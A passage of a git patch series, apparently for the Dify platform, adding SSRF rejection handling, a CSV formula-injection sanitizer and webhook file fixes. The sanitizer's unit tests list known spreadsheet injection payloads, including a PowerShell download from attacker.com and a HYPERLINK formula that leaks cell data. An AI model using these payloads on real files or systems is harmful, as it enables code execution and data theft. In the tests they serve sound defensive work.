) From 2bf44057e95e4660bf5260ea58143546272db919 Mon Sep 17 00:00:00 2001 From: zyssyz123 <916125788@qq.com> Date: Mon, 15 Dec 2025 16:28:25 +0800 Subject: [PATCH 04/27] fix: ssrf, add internal ip filter when parse tool schema (#29548) Co-authored-by: gemini-code-assist[bot] <176961590+gemini-code-assist[bot]@users.noreply.github.com> Co-authored-by: autofix-ci[bot] <114827586+autofix-ci[bot]@users.noreply.github.com> Co-authored-by: Yeuoly <45712896+Yeuoly@users.noreply.github.com> --- api/core/helper/ssrf_proxy.py | 13 +++++++++++++ api/core/tools/errors.py | 4 ++++ api/core/tools/utils/parser.py | 3 +-- 3 files changed, 18 insertions(+), 2 deletions(-) diff --git a/api/core/helper/ssrf_proxy.py b/api/core/helper/ssrf_proxy.py index 0de026f3c7..6c98aea1be 100644 --- a/api/core/helper/ssrf_proxy.py +++ b/api/core/helper/ssrf_proxy.py @@ -9,6 +9,7 @@ import httpx from configs import dify_config from core.helper.http_client_pooling import get_pooled_http_client +from core.tools.errors import ToolSSRFError logger = logging.getLogger(__name__) @@ -93,6 +94,18 @@ def make_request(method, url, max_retries=SSRF_DEFAULT_MAX_RETRIES, **kwargs): while retries <= max_retries: try: response = client.request(method=method, url=url, **kwargs) + # Check for SSRF protection by Squid proxy + if response.status_code in (401, 403): + # Check if this is a Squid SSRF rejection + server_header = response.headers.get("server", "").lower() + via_header = response.headers.get("via", "").lower() + + # Squid typically identifies itself in Server or Via headers + if "squid" in server_header or "squid" in via_header: + raise ToolSSRFError( + f"Access to '{url}' was blocked by SSRF protection. " + f"The URL may point to a private or local network address. " + ) if response.status_code not in STATUS_FORCELIST: return response diff --git a/api/core/tools/errors.py b/api/core/tools/errors.py index b0c2232857..e4afe24426 100644 --- a/api/core/tools/errors.py +++ b/api/core/tools/errors.py @@ -29,6 +29,10 @@ class ToolApiSchemaError(ValueError): pass +class ToolSSRFError(ValueError): + pass + + class ToolCredentialPolicyViolationError(ValueError): pass diff --git a/api/core/tools/utils/parser.py b/api/core/tools/utils/parser.py index 6eabde3991..3486182192 100644 --- a/api/core/tools/utils/parser.py +++ b/api/core/tools/utils/parser.py @@ -425,7 +425,7 @@ class ApiBasedToolSchemaParser: except ToolApiSchemaError as e: openapi_error = e - # openai parse error, fallback to swagger + # openapi parse error, fallback to swagger try: converted_swagger = ApiBasedToolSchemaParser.parse_swagger_to_openapi( loaded_content, extra_info=extra_info, warning=warning @@ -436,7 +436,6 @@ class ApiBasedToolSchemaParser: ), schema_type except ToolApiSchemaError as e: swagger_error = e - # swagger parse error, fallback to openai plugin try: openapi_plugin = ApiBasedToolSchemaParser.parse_openai_plugin_json_to_tool_bundle( From bd7b1fc6fbb648f6bf6c6006230262c77029c896 Mon Sep 17 00:00:00 2001 From: zyssyz123 <916125788@qq.com> Date: Mon, 15 Dec 2025 17:14:05 +0800 Subject: [PATCH 05/27] fix: csv injection in annotations export (#29462) Co-authored-by: hj24 Co-authored-by: autofix-ci[bot] <114827586+autofix-ci[bot]@users.noreply.github.com> --- api/controllers/console/app/annotation.py | 14 +- api/core/helper/csv_sanitizer.py | 89 +++++++++++ api/services/annotation_service.py | 17 ++ .../console/app/test_annotation_security.py | 7 +- .../core/helper/test_csv_sanitizer.py | 151 ++++++++++++++++++ 5 files changed, 271 insertions(+), 7 deletions(-) create mode 100644 api/core/helper/csv_sanitizer.py create mode 100644 api/tests/unit_tests/core/helper/test_csv_sanitizer.py diff --git a/api/controllers/console/app/annotation.py b/api/controllers/console/app/annotation.py index 0aed36a7fd..6a4c1528b0 100644 --- a/api/controllers/console/app/annotation.py +++ b/api/controllers/console/app/annotation.py @@ -1,6 +1,6 @@ from typing import Any, Literal -from flask import abort, request +from flask import abort, make_response, request from flask_restx import Resource, fields, marshal, marshal_with from pydantic import BaseModel, Field, field_validator @@ -259,7 +259,7 @@ class AnnotationApi(Resource): @console_ns.route("/apps//annotations/export") class AnnotationExportApi(Resource): @console_ns.doc("export_annotations") - @console_ns.doc(description="Export all annotations for an app") + @console_ns.doc(description="Export all annotations for an app with CSV injection protection") @console_ns.doc(params={"app_id": "Application ID"}) @console_ns.response( 200, @@ -274,8 +274,14 @@ class AnnotationExportApi(Resource): def get(self, app_id): app_id = str(app_id) annotation_list = AppAnnotationService.export_annotation_list_by_app_id(app_id) - response = {"data": marshal(annotation_list, annotation_fields)} - return response, 200 + response_data = {"data": marshal(annotation_list, annotation_fields)} + + # Create response with secure headers for CSV export + response = make_response(response_data, 200) + response.headers["Content-Type"] = "application/json; charset=utf-8" + response.headers["X-Content-Type-Options"] = "nosniff" + + return response @console_ns.route("/apps//annotations/") diff --git a/api/core/helper/csv_sanitizer.py b/api/core/helper/csv_sanitizer.py new file mode 100644 index 0000000000..0023de5a35 --- /dev/null +++ b/api/core/helper/csv_sanitizer.py @@ -0,0 +1,89 @@ +"""CSV sanitization utilities to prevent formula injection attacks.""" + +from typing import Any + + +class CSVSanitizer: + """ + Sanitizer for CSV export to prevent formula injection attacks. + + This class provides methods to sanitize data before CSV export by escaping + characters that could be interpreted as formulas by spreadsheet applications + (Excel, LibreOffice, Google Sheets). + + Formula injection occurs when user-controlled data starting with special + characters (=, +, -, @, tab, carriage return) is exported to CSV and opened + in a spreadsheet application, potentially executing malicious commands. + """ + + # Characters that can start a formula in Excel/LibreOffice/Google Sheets + FORMULA_CHARS = frozenset({"=", "+", "-", "@", "\t", "\r"}) + + @classmethod + def sanitize_value(cls, value: Any) -> str: + """ + Sanitize a value for safe CSV export. + + Prefixes formula-initiating characters with a single quote to prevent + Excel/LibreOffice/Google Sheets from treating them as formulas. + + Args: + value: The value to sanitize (will be converted to string) + + Returns: + Sanitized string safe for CSV export + + Examples: + >>> CSVSanitizer.sanitize_value("=1+1") + "'=1+1" + >>> CSVSanitizer.sanitize_value("Hello World") + "Hello World" + >>> CSVSanitizer.sanitize_value(None) + "" + """ + if value is None: + return "" + + # Convert to string + str_value = str(value) + + # If empty, return as is + if not str_value: + return "" + + # Check if first character is a formula initiator + if str_value[0] in cls.FORMULA_CHARS: + # Prefix with single quote to escape + return f"'{str_value}" + + return str_value + + @classmethod + def sanitize_dict(cls, data: dict[str, Any], fields_to_sanitize: list[str] | None = None) -> dict[str, Any]: + """ + Sanitize specified fields in a dictionary. + + Args: + data: Dictionary containing data to sanitize + fields_to_sanitize: List of field names to sanitize. + If None, sanitizes all string fields. + + Returns: + Dictionary with sanitized values (creates a shallow copy) + + Examples: + >>> data = {"question": "=1+1", "answer": "+calc", "id": "123"} + >>> CSVSanitizer.sanitize_dict(data, ["question", "answer"]) + {"question": "'=1+1", "answer": "'+calc", "id": "123"} + """ + sanitized = data.copy() + + if fields_to_sanitize is None: + # Sanitize all string fields + fields_to_sanitize = [k for k, v in data.items() if isinstance(v, str)] + + for field in fields_to_sanitize: + if field in sanitized: + sanitized[field] = cls.sanitize_value(sanitized[field]) + + return sanitized diff --git a/api/services/annotation_service.py b/api/services/annotation_service.py index f750186ab0..d03cbddceb 100644 --- a/api/services/annotation_service.py +++ b/api/services/annotation_service.py @@ -8,6 +8,7 @@ from sqlalchemy import or_, select from werkzeug.datastructures import FileStorage from werkzeug.exceptions import NotFound +from core.helper.csv_sanitizer import CSVSanitizer from extensions.ext_database import db from extensions.ext_redis import redis_client from libs.datetime_utils import naive_utc_now @@ -158,6 +159,12 @@ class AppAnnotationService: @classmethod def export_annotation_list_by_app_id(cls, app_id: str): + """ + Export all annotations for an app with CSV injection protection. + + Sanitizes question and content fields to prevent formula injection attacks + when exported to CSV format. + """ # get app info _, current_tenant_id = current_account_with_tenant() app = ( @@ -174,6 +181,16 @@ class AppAnnotationService: .order_by(MessageAnnotation.created_at.desc()) .all() ) + + # Sanitize CSV-injectable fields to prevent formula injection + for annotation in annotations: + # Sanitize question field if present + if annotation.question: + annotation.question = CSVSanitizer.sanitize_value(annotation.question) + # Sanitize content field (answer) + if annotation.content: + annotation.content = CSVSanitizer.sanitize_value(annotation.content) + return annotations @classmethod diff --git a/api/tests/unit_tests/controllers/console/app/test_annotation_security.py b/api/tests/unit_tests/controllers/console/app/test_annotation_security.py index 36da3c264e..11d12792c9 100644 --- a/api/tests/unit_tests/controllers/console/app/test_annotation_security.py +++ b/api/tests/unit_tests/controllers/console/app/test_annotation_security.py @@ -250,8 +250,8 @@ class TestAnnotationImportServiceValidation: """Test that invalid CSV format is handled gracefully.""" from services.annotation_service import AppAnnotationService - # Create invalid CSV content - csv_content = 'invalid,csv,format\nwith,unbalanced,quotes,and"stuff' + # Create CSV with only one column (should require at least 2 columns for question and answer) + csv_content = "single_column_header\nonly_one_value" file = FileStorage(stream=io.BytesIO(csv_content.encode()), filename="test.csv", content_type="text/csv") @@ -262,8 +262,9 @@ class TestAnnotationImportServiceValidation: result = AppAnnotationService.batch_import_app_annotations("app_id", file) - # Should return error message + # Should return error message about invalid format (less than 2 columns) assert "error_msg" in result + assert "at least 2 columns" in result["error_msg"].lower() def test_valid_import_succeeds(self, mock_app, mock_db_session): """Test that valid import request succeeds.""" diff --git a/api/tests/unit_tests/core/helper/test_csv_sanitizer.py b/api/tests/unit_tests/core/helper/test_csv_sanitizer.py new file mode 100644 index 0000000000..443c2824d5 --- /dev/null +++ b/api/tests/unit_tests/core/helper/test_csv_sanitizer.py @@ -0,0 +1,151 @@ +"""Unit tests for CSV sanitizer.""" + +from core.helper.csv_sanitizer import CSVSanitizer + + +class TestCSVSanitizer: + """Test cases for CSV sanitization to prevent formula injection attacks.""" + + def test_sanitize_formula_equals(self): + """Test sanitizing values starting with = (most common formula injection).""" + assert CSVSanitizer.sanitize_value("=cmd|'/c calc'!A0") == "'=cmd|'/c calc'!A0" + assert CSVSanitizer.sanitize_value("=SUM(A1:A10)") == "'=SUM(A1:A10)" + assert CSVSanitizer.sanitize_value("=1+1") == "'=1+1" + assert CSVSanitizer.sanitize_value("=@SUM(1+1)") == "'=@SUM(1+1)" + + def test_sanitize_formula_plus(self): + """Test sanitizing values starting with + (plus formula injection).""" + assert CSVSanitizer.sanitize_value("+1+1+cmd|'/c calc") == "'+1+1+cmd|'/c calc" + assert CSVSanitizer.sanitize_value("+123") == "'+123" + assert CSVSanitizer.sanitize_value("+cmd|'/c calc'!A0") == "'+cmd|'/c calc'!A0" + + def test_sanitize_formula_minus(self): + """Test sanitizing values starting with - (minus formula injection).""" + assert CSVSanitizer.sanitize_value("-2+3+cmd|'/c calc") == "'-2+3+cmd|'/c calc" + assert CSVSanitizer.sanitize_value("-456") == "'-456" + assert CSVSanitizer.sanitize_value("-cmd|'/c notepad") == "'-cmd|'/c notepad" + + def test_sanitize_formula_at(self): + """Test sanitizing values starting with @ (at-sign formula injection).""" + assert CSVSanitizer.sanitize_value("@SUM(1+1)*cmd|'/c calc") == "'@SUM(1+1)*cmd|'/c calc" + assert CSVSanitizer.sanitize_value("@AVERAGE(1,2,3)") == "'@AVERAGE(1,2,3)" + + def test_sanitize_formula_tab(self): + """Test sanitizing values starting with tab character.""" + assert CSVSanitizer.sanitize_value("\t=1+1") == "'\t=1+1" + assert CSVSanitizer.sanitize_value("\tcalc") == "'\tcalc" + + def test_sanitize_formula_carriage_return(self): + """Test sanitizing values starting with carriage return.""" + assert CSVSanitizer.sanitize_value("\r=1+1") == "'\r=1+1" + assert CSVSanitizer.sanitize_value("\rcmd") == "'\rcmd" + + def test_sanitize_safe_values(self): + """Test that safe values are not modified.""" + assert CSVSanitizer.sanitize_value("Hello World") == "Hello World" + assert CSVSanitizer.sanitize_value("123") == "123" + assert CSVSanitizer.sanitize_value("test@example.com") == "test@example.com" + assert CSVSanitizer.sanitize_value("Normal text") == "Normal text" + assert CSVSanitizer.sanitize_value("Question: How are you?") == "Question: How are you?" + + def test_sanitize_safe_values_with_special_chars_in_middle(self): + """Test that special characters in the middle are not escaped.""" + assert CSVSanitizer.sanitize_value("A = B + C") == "A = B + C" + assert CSVSanitizer.sanitize_value("Price: $10 + $20") == "Price: $10 + $20" + assert CSVSanitizer.sanitize_value("Email: user@domain.com") == "Email: user@domain.com" + + def test_sanitize_empty_values(self): + """Test handling of empty values.""" + assert CSVSanitizer.sanitize_value("") == "" + assert CSVSanitizer.sanitize_value(None) == "" + + def test_sanitize_numeric_types(self): + """Test handling of numeric types.""" + assert CSVSanitizer.sanitize_value(123) == "123" + assert CSVSanitizer.sanitize_value(456.789) == "456.789" + assert CSVSanitizer.sanitize_value(0) == "0" + # Negative numbers should be escaped (start with -) + assert CSVSanitizer.sanitize_value(-123) == "'-123" + + def test_sanitize_boolean_types(self): + """Test handling of boolean types.""" + assert CSVSanitizer.sanitize_value(True) == "True" + assert CSVSanitizer.sanitize_value(False) == "False" + + def test_sanitize_dict_with_specific_fields(self): + """Test sanitizing specific fields in a dictionary.""" + data = { + "question": "=1+1", + "answer": "+cmd|'/c calc", + "safe_field": "Normal text", + "id": "12345", + } + sanitized = CSVSanitizer.sanitize_dict(data, ["question", "answer"]) + + assert sanitized["question"] == "'=1+1" + assert sanitized["answer"] == "'+cmd|'/c calc" + assert sanitized["safe_field"] == "Normal text" + assert sanitized["id"] == "12345" + + def test_sanitize_dict_all_string_fields(self): + """Test sanitizing all string fields when no field list provided.""" + data = { + "question": "=1+1", + "answer": "+calc", + "id": 123, # Not a string, should be ignored + } + sanitized = CSVSanitizer.sanitize_dict(data, None) + + assert sanitized["question"] == "'=1+1" + assert sanitized["answer"] == "'+calc" + assert sanitized["id"] == 123 # Unchanged + + def test_sanitize_dict_with_missing_fields(self): + """Test that missing fields in dict don't cause errors.""" + data = {"question": "=1+1"} + sanitized = CSVSanitizer.sanitize_dict(data, ["question", "nonexistent_field"]) + + assert sanitized["question"] == "'=1+1" + assert "nonexistent_field" not in sanitized + + def test_sanitize_dict_creates_copy(self): + """Test that sanitize_dict creates a copy and doesn't modify original.""" + original = {"question": "=1+1", "answer": "Normal"} + sanitized = CSVSanitizer.sanitize_dict(original, ["question"]) + + assert original["question"] == "=1+1" # Original unchanged + assert sanitized["question"] == "'=1+1" # Copy sanitized + + def test_real_world_csv_injection_payloads(self): + """Test against real-world CSV injection attack payloads.""" + # Common DDE (Dynamic Data Exchange) attack payloads + payloads = [ + "=cmd|'/c calc'!A0", + "=cmd|'/c notepad'!A0", + "+cmd|'/c powershell IEX(wget attacker.com/malware.ps1)'", + "-2+3+cmd|'/c calc'", + "@SUM(1+1)*cmd|'/c calc'", + "=1+1+cmd|'/c calc'", + '=HYPERLINK("http://attacker.com?leak="&A1&A2,"Click here")', + ] + + for payload in payloads: + result = CSVSanitizer.sanitize_value(payload) + # All should be prefixed with single quote + assert result.startswith("'"), f"Payload not sanitized: {payload}" + assert result == f"'{payload}", f"Unexpected sanitization for: {payload}" + + def test_multiline_strings(self): + """Test handling of multiline strings.""" + multiline = "Line 1\nLine 2\nLine 3" + assert CSVSanitizer.sanitize_value(multiline) == multiline + + multiline_with_formula = "=SUM(A1)\nLine 2" + assert CSVSanitizer.sanitize_value(multiline_with_formula) == f"'{multiline_with_formula}" + + def test_whitespace_only_strings(self): + """Test handling of whitespace-only strings.""" + assert CSVSanitizer.sanitize_value(" ") == " " + assert CSVSanitizer.sanitize_value("\n\n") == "\n\n" + # Tab at start should be escaped + assert CSVSanitizer.sanitize_value("\t ") == "'\t " From a8f3061b3c9350e1570979794e5cb521dd60a2da Mon Sep 17 00:00:00 2001 From: Joel Date: Mon, 15 Dec 2025 18:02:34 +0800 Subject: [PATCH 06/27] fix: all upload files are disabled if upload file feature disabled (#29681) --- web/app/components/base/chat/chat/chat-input-area/index.tsx | 2 +- web/app/components/base/file-uploader/hooks.ts | 6 +++--- 2 files changed, 4 insertions(+), 4 deletions(-) diff --git a/web/app/components/base/chat/chat/chat-input-area/index.tsx b/web/app/components/base/chat/chat/chat-input-area/index.tsx index 7d08b84b8e..5004bb2a92 100644 --- a/web/app/components/base/chat/chat/chat-input-area/index.tsx +++ b/web/app/components/base/chat/chat/chat-input-area/index.tsx @@ -79,7 +79,7 @@ const ChatInputArea = ({ handleDropFile, handleClipboardPasteFile, isDragActive, - } = useFile(visionConfig!) + } = useFile(visionConfig!, false) const { checkInputsForm } = useCheckInputsForms() const historyRef = useRef(['']) const [currentIndex, setCurrentIndex] = useState(-1) diff --git a/web/app/components/base/file-uploader/hooks.ts b/web/app/components/base/file-uploader/hooks.ts index baef5ff7d8..2e72574cfb 100644 --- a/web/app/components/base/file-uploader/hooks.ts +++ b/web/app/components/base/file-uploader/hooks.ts @@ -47,7 +47,7 @@ export const useFileSizeLimit = (fileUploadConfig?: FileUploadConfigResponse) => } } -export const useFile = (fileConfig: FileUpload) => { +export const useFile = (fileConfig: FileUpload, noNeedToCheckEnable = true) => { const { t } = useTranslation() const { notify } = useToastContext() const fileStore = useFileStore() @@ -247,7 +247,7 @@ export const useFile = (fileConfig: FileUpload) => { const handleLocalFileUpload = useCallback((file: File) => { // Check file upload enabled - if (!fileConfig.enabled) { + if (!noNeedToCheckEnable && !fileConfig.enabled) { notify({ type: 'error', message: t('common.fileUploader.uploadDisabled') }) return } @@ -303,7 +303,7 @@ export const useFile = (fileConfig: FileUpload) => { false, ) reader.readAsDataURL(file) - }, [checkSizeLimit, notify, t, handleAddFile, handleUpdateFile, params.token, fileConfig?.allowed_file_types, fileConfig?.allowed_file_extensions, fileConfig?.enabled]) + }, [noNeedToCheckEnable, checkSizeLimit, notify, t, handleAddFile, handleUpdateFile, params.token, fileConfig?.allowed_file_types, fileConfig?.allowed_file_extensions, fileConfig?.enabled]) const handleClipboardPasteFile = useCallback((e: ClipboardEvent) => { const file = e.clipboardData?.files[0] From 09982a1c95e1ce65981cfeef2c6da852b74678a2 Mon Sep 17 00:00:00 2001 From: wangxiaolei Date: Mon, 15 Dec 2025 19:55:59 +0800 Subject: [PATCH 07/27] fix: webhook node output file as file variable (#29621) --- .../workflow/nodes/trigger_webhook/node.py | 59 ++- api/factories/file_factory.py | 17 +- .../services/test_webhook_service.py | 6 +- .../console/app/test_annotation_security.py | 14 +- .../webhook/test_webhook_file_conversion.py | 452 ++++++++++++++++++ .../nodes/webhook/test_webhook_node.py | 75 ++- .../services/test_webhook_service.py | 6 +- 7 files changed, 585 insertions(+), 44 deletions(-) create mode 100644 api/tests/unit_tests/core/workflow/nodes/webhook/test_webhook_file_conversion.py diff --git a/api/core/workflow/nodes/trigger_webhook/node.py b/api/core/workflow/nodes/trigger_webhook/node.py index 3631c8653d..ec8c4b8ee3 100644 --- a/api/core/workflow/nodes/trigger_webhook/node.py +++ b/api/core/workflow/nodes/trigger_webhook/node.py @@ -1,14 +1,22 @@ +import logging from collections.abc import Mapping from typing import Any +from core.file import FileTransferMethod +from core.variables.types import SegmentType +from core.variables.variables import FileVariable from core.workflow.constants import SYSTEM_VARIABLE_NODE_ID from core.workflow.entities.workflow_node_execution import WorkflowNodeExecutionStatus from core.workflow.enums import NodeExecutionType, NodeType from core.workflow.node_events import NodeRunResult from core.workflow.nodes.base.node import Node +from factories import file_factory +from factories.variable_factory import build_segment_with_type from .entities import ContentType, WebhookData +logger = logging.getLogger(__name__) + class TriggerWebhookNode(Node[WebhookData]): node_type = NodeType.TRIGGER_WEBHOOK @@ -60,6 +68,34 @@ class TriggerWebhookNode(Node[WebhookData]): outputs=outputs, ) + def generate_file_var(self, param_name: str, file: dict): + related_id = file.get("related_id") + transfer_method_value = file.get("transfer_method") + if transfer_method_value: + transfer_method = FileTransferMethod.value_of(transfer_method_value) + match transfer_method: + case FileTransferMethod.LOCAL_FILE | FileTransferMethod.REMOTE_URL: + file["upload_file_id"] = related_id + case FileTransferMethod.TOOL_FILE: + file["tool_file_id"] = related_id + case FileTransferMethod.DATASOURCE_FILE: + file["datasource_file_id"] = related_id + + try: + file_obj = file_factory.build_from_mapping( + mapping=file, + tenant_id=self.tenant_id, + ) + file_segment = build_segment_with_type(SegmentType.FILE, file_obj) + return FileVariable(name=param_name, value=file_segment.value, selector=[self.id, param_name]) + except ValueError: + logger.error( + "Failed to build FileVariable for webhook file parameter %s", + param_name, + exc_info=True, + ) + return None + def _extract_configured_outputs(self, webhook_inputs: dict[str, Any]) -> dict[str, Any]: """Extract outputs based on node configuration from webhook inputs.""" outputs = {} @@ -107,18 +143,33 @@ class TriggerWebhookNode(Node[WebhookData]): outputs[param_name] = str(webhook_data.get("body", {}).get("raw", "")) continue elif self.node_data.content_type == ContentType.BINARY: - outputs[param_name] = webhook_data.get("body", {}).get("raw", b"") + raw_data: dict = webhook_data.get("body", {}).get("raw", {}) + file_var = self.generate_file_var(param_name, raw_data) + if file_var: + outputs[param_name] = file_var + else: + outputs[param_name] = raw_data continue if param_type == "file": # Get File object (already processed by webhook controller) - file_obj = webhook_data.get("files", {}).get(param_name) - outputs[param_name] = file_obj + files = webhook_data.get("files", {}) + if files and isinstance(files, dict): + file = files.get(param_name) + if file and isinstance(file, dict): + file_var = self.generate_file_var(param_name, file) + if file_var: + outputs[param_name] = file_var + else: + outputs[param_name] = files + else: + outputs[param_name] = files + else: + outputs[param_name] = files else: # Get regular body parameter outputs[param_name] = webhook_data.get("body", {}).get(param_name) # Include raw webhook data for debugging/advanced use outputs["_webhook_raw"] = webhook_data - return outputs diff --git a/api/factories/file_factory.py b/api/factories/file_factory.py index 737a79f2b0..bd71f18af2 100644 --- a/api/factories/file_factory.py +++ b/api/factories/file_factory.py @@ -1,3 +1,4 @@ +import logging import mimetypes import os import re @@ -17,6 +18,8 @@ from core.helper import ssrf_proxy from extensions.ext_database import db from models import MessageFile, ToolFile, UploadFile +logger = logging.getLogger(__name__) + def build_from_message_files( *, @@ -356,15 +359,20 @@ def _build_from_tool_file( transfer_method: FileTransferMethod, strict_type_validation: bool = False, ) -> File: + # Backward/interop compatibility: allow tool_file_id to come from related_id or URL + tool_file_id = mapping.get("tool_file_id") + + if not tool_file_id: + raise ValueError(f"ToolFile {tool_file_id} not found") tool_file = db.session.scalar( select(ToolFile).where( - ToolFile.id == mapping.get("tool_file_id"), + ToolFile.id == tool_file_id, ToolFile.tenant_id == tenant_id, ) ) if tool_file is None: - raise ValueError(f"ToolFile {mapping.get('tool_file_id')} not found") + raise ValueError(f"ToolFile {tool_file_id} not found") extension = "." + tool_file.file_key.split(".")[-1] if "." in tool_file.file_key else ".bin" @@ -402,10 +410,13 @@ def _build_from_datasource_file( transfer_method: FileTransferMethod, strict_type_validation: bool = False, ) -> File: + datasource_file_id = mapping.get("datasource_file_id") + if not datasource_file_id: + raise ValueError(f"DatasourceFile {datasource_file_id} not found") datasource_file = ( db.session.query(UploadFile) .where( - UploadFile.id == mapping.get("datasource_file_id"), + UploadFile.id == datasource_file_id, UploadFile.tenant_id == tenant_id, ) .first() diff --git a/api/tests/test_containers_integration_tests/services/test_webhook_service.py b/api/tests/test_containers_integration_tests/services/test_webhook_service.py index 8328db950c..e3431fd382 100644 --- a/api/tests/test_containers_integration_tests/services/test_webhook_service.py +++ b/api/tests/test_containers_integration_tests/services/test_webhook_service.py @@ -233,7 +233,7 @@ class TestWebhookService: "/webhook", method="POST", headers={"Content-Type": "multipart/form-data"}, - data={"message": "test", "upload": file_storage}, + data={"message": "test", "file": file_storage}, ): webhook_trigger = MagicMock() webhook_trigger.tenant_id = "test_tenant" @@ -242,7 +242,7 @@ class TestWebhookService: assert webhook_data["method"] == "POST" assert webhook_data["body"]["message"] == "test" - assert "upload" in webhook_data["files"] + assert "file" in webhook_data["files"] # Verify file processing was called mock_external_dependencies["tool_file_manager"].assert_called_once() @@ -414,7 +414,7 @@ class TestWebhookService: "data": { "method": "post", "content_type": "multipart/form-data", - "body": [{"name": "upload", "type": "file", "required": True}], + "body": [{"name": "file", "type": "file", "required": True}], } } diff --git a/api/tests/unit_tests/controllers/console/app/test_annotation_security.py b/api/tests/unit_tests/controllers/console/app/test_annotation_security.py index 11d12792c9..06a7b98baf 100644 --- a/api/tests/unit_tests/controllers/console/app/test_annotation_security.py +++ b/api/tests/unit_tests/controllers/console/app/test_annotation_security.py @@ -9,6 +9,7 @@ import io from unittest.mock import MagicMock, patch import pytest +from pandas.errors import ParserError from werkzeug.datastructures import FileStorage from configs import dify_config @@ -250,21 +251,22 @@ class TestAnnotationImportServiceValidation: """Test that invalid CSV format is handled gracefully.""" from services.annotation_service import AppAnnotationService - # Create CSV with only one column (should require at least 2 columns for question and answer) - csv_content = "single_column_header\nonly_one_value" - + # Any content is fine once we force ParserError + csv_content = 'invalid,csv,format\nwith,unbalanced,quotes,and"stuff' file = FileStorage(stream=io.BytesIO(csv_content.encode()), filename="test.csv", content_type="text/csv") mock_db_session.query.return_value.where.return_value.first.return_value = mock_app - with patch("services.annotation_service.current_account_with_tenant") as mock_auth: + with ( + patch("services.annotation_service.current_account_with_tenant") as mock_auth, + patch("services.annotation_service.pd.read_csv", side_effect=ParserError("malformed CSV")), + ): mock_auth.return_value = (MagicMock(id="user_id"), "tenant_id") result = AppAnnotationService.batch_import_app_annotations("app_id", file) - # Should return error message about invalid format (less than 2 columns) assert "error_msg" in result - assert "at least 2 columns" in result["error_msg"].lower() + assert "malformed" in result["error_msg"].lower() def test_valid_import_succeeds(self, mock_app, mock_db_session): """Test that valid import request succeeds.""" diff --git a/api/tests/unit_tests/core/workflow/nodes/webhook/test_webhook_file_conversion.py b/api/tests/unit_tests/core/workflow/nodes/webhook/test_webhook_file_conversion.py new file mode 100644 index 0000000000..ead2334473 --- /dev/null +++ b/api/tests/unit_tests/core/workflow/nodes/webhook/test_webhook_file_conversion.py @@ -0,0 +1,452 @@ +""" +Unit tests for webhook file conversion fix. + +This test verifies that webhook trigger nodes properly convert file dictionaries +to FileVariable objects, fixing the "Invalid variable type: ObjectVariable" error +when passing files to downstream LLM nodes. +""" + +from unittest.mock import Mock, patch + +from core.app.entities.app_invoke_entities import InvokeFrom +from core.workflow.entities.graph_init_params import GraphInitParams +from core.workflow.entities.workflow_node_execution import WorkflowNodeExecutionStatus +from core.workflow.nodes.trigger_webhook.entities import ( + ContentType, + Method, + WebhookBodyParameter, + WebhookData, +) +from core.workflow.nodes.trigger_webhook.node import TriggerWebhookNode +from core.workflow.runtime.graph_runtime_state import GraphRuntimeState +from core.workflow.runtime.variable_pool import VariablePool +from core.workflow.system_variable import SystemVariable +from models.enums import UserFrom +from models.workflow import WorkflowType + + +def create_webhook_node( + webhook_data: WebhookData, + variable_pool: VariablePool, + tenant_id: str = "test-tenant", +) -> TriggerWebhookNode: + """Helper function to create a webhook node with proper initialization.""" + node_config = { + "id": "webhook-node-1", + "data": webhook_data.model_dump(), + } + + graph_init_params = GraphInitParams( + tenant_id=tenant_id, + app_id="test-app", + workflow_type=WorkflowType.WORKFLOW, + workflow_id="test-workflow", + graph_config={}, + user_id="test-user", + user_from=UserFrom.ACCOUNT, + invoke_from=InvokeFrom.SERVICE_API, + call_depth=0, + ) + + runtime_state = GraphRuntimeState( + variable_pool=variable_pool, + start_at=0, + ) + + node = TriggerWebhookNode( + id="webhook-node-1", + config=node_config, + graph_init_params=graph_init_params, + graph_runtime_state=runtime_state, + ) + + # Attach a lightweight app_config onto runtime state for tenant lookups + runtime_state.app_config = Mock() + runtime_state.app_config.tenant_id = tenant_id + + # Provide compatibility alias expected by node implementation + # Some nodes reference `self.node_id`; expose it as an alias to `self.id` for tests + node.node_id = node.id + + return node + + +def create_test_file_dict( + filename: str = "test.jpg", + file_type: str = "image", + transfer_method: str = "local_file", +) -> dict: + """Create a test file dictionary as it would come from webhook service.""" + return { + "id": "file-123", + "tenant_id": "test-tenant", + "type": file_type, + "filename": filename, + "extension": ".jpg", + "mime_type": "image/jpeg", + "transfer_method": transfer_method, + "related_id": "related-123", + "storage_key": "storage-key-123", + "size": 1024, + "url": "https://example.com/test.jpg", + "created_at": 1234567890, + "used_at": None, + "hash": "file-hash-123", + } + + +def test_webhook_node_file_conversion_to_file_variable(): + """Test that webhook node converts file dictionaries to FileVariable objects.""" + # Create test file dictionary (as it comes from webhook service) + file_dict = create_test_file_dict("uploaded_image.jpg") + + data = WebhookData( + title="Test Webhook with File", + method=Method.POST, + content_type=ContentType.FORM_DATA, + body=[ + WebhookBodyParameter(name="image_upload", type="file", required=True), + WebhookBodyParameter(name="message", type="string", required=False), + ], + ) + + variable_pool = VariablePool( + system_variables=SystemVariable.empty(), + user_inputs={ + "webhook_data": { + "headers": {}, + "query_params": {}, + "body": {"message": "Test message"}, + "files": { + "image_upload": file_dict, + }, + } + }, + ) + + node = create_webhook_node(data, variable_pool) + + # Mock the file factory and variable factory + with ( + patch("factories.file_factory.build_from_mapping") as mock_file_factory, + patch("core.workflow.nodes.trigger_webhook.node.build_segment_with_type") as mock_segment_factory, + patch("core.workflow.nodes.trigger_webhook.node.FileVariable") as mock_file_variable, + ): + # Setup mocks + mock_file_obj = Mock() + mock_file_obj.to_dict.return_value = file_dict + mock_file_factory.return_value = mock_file_obj + + mock_segment = Mock() + mock_segment.value = mock_file_obj + mock_segment_factory.return_value = mock_segment + + mock_file_var_instance = Mock() + mock_file_variable.return_value = mock_file_var_instance + + # Run the node + result = node._run() + + # Verify successful execution + assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED + + # Verify file factory was called with correct parameters + mock_file_factory.assert_called_once_with( + mapping=file_dict, + tenant_id="test-tenant", + ) + + # Verify segment factory was called to create FileSegment + mock_segment_factory.assert_called_once() + + # Verify FileVariable was created with correct parameters + mock_file_variable.assert_called_once() + call_args = mock_file_variable.call_args[1] + assert call_args["name"] == "image_upload" + # value should be whatever build_segment_with_type.value returned + assert call_args["value"] == mock_segment.value + assert call_args["selector"] == ["webhook-node-1", "image_upload"] + + # Verify output contains the FileVariable, not the original dict + assert result.outputs["image_upload"] == mock_file_var_instance + assert result.outputs["message"] == "Test message" + + +def 